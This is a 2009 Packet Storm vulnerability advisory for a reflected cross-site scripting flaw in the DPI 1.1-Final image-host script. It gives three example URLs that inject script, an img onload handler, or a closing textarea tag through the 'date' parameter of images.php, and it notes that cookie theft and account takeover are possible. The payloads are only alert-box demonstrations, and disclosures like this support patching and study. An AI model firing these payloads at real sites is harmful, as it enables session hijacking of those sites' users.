DPI 1.1-Final Cross Site Scripting

2009-12-09T00:00:00
ID PACKETSTORM:83604
Type packetstorm
Reporter andresg888
Modified 2009-12-09T00:00:00

Description

                                        
                                            `  
view source  
print?  
##########################[andresg888]##########################  
# Vendor : http://www.image-host-script.com/  
# Contact : andresg888[4t]gmail[dot]com  
# Web: : www.ilegalintrusion.net<http://www.ilegalintrusion.net> & www.bl4ck-p0rtal.org<http://www.bl4ck-p0rtal.org>  
# Dork : No DoRk f0R ScRipT KiDDieS  
########################################################################  
# Example1: http://server/path/images.php?date=%3Cscript%3Ealert(123456)%3C/script%3E  
# Example2: http://server/path/images.php?date=%3Cimg+src=http://www.site.extension/path/image.gif+onload=alert(123456)%3E  
# Example3: http://server/path/images.php?date=</textarea>  
########################################################################  
# Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable  
# application to fool a user in order to gather data from them. An attacker can steal the  
# session cookie and take over the account.  
########################################################################  
# Greetz : _84kur10_ , Brunos_50, mmrg5486, LU73K, Joshu4X, 3l_d105_4r35  
# Special Thanks : all members from ilegalintrusion & black-portal  
##########################[andresg888]#################################  
  
`